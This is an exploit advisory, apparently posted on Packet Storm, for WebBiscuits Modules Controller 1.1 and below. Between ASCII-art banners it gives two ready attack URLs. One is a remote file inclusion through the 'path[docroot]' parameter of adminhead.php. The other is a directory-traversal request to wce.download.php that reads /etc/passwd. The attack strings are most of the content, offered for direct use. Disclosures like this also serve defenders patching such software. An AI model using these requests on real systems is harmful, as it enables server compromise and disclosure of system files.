WebBiscuits Modules Controller versions 1.1 and below suffer from remote file inclusion and remote file disclosure vulnerabilities.
32cbcaaa4e1e1b36c5e88733632fd2442c73c0f2dbd0370f53561b987f5767fb _____ ____ __ __ _ ____ ____ ____
|_ _| | _ \ \ \ / / / \ / ___| / ___| / ___|
| | | |_) | \ V / / _ \ | | _ | | | |
| | | _ < | | / ___ \ | |_| | _ | |___ | |___
|_| |_| \_\ |_| /_/ \_\ \____| (_) \____| \____|
WebBiscuits Modules Controller <= 1.1 (RFI/RFD) Multiple Remote Vulnerabilities
Script : http://webbiscuits.com/download/all11.zip
I- Remote File Inclusion Vulnerability
http://xx.com/adminhead.php?path[docroot]=020.txt
And More Files ....
II- Remote File Disclosure Vulnerability
http://xx.com/faqsupport/wce.download.php?download=../../../../../../../../../../../../../etc/passwd
____ _ _ __ __
/ ___| ___ | | __| | | \/ |
| | _ / _ \ | | / _` | | |\/| |
| |_| | | (_) | | |___ | (_| | | | | |
\____| \___/ |_____| \__,_| _____ |_| |_|
|_____|
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed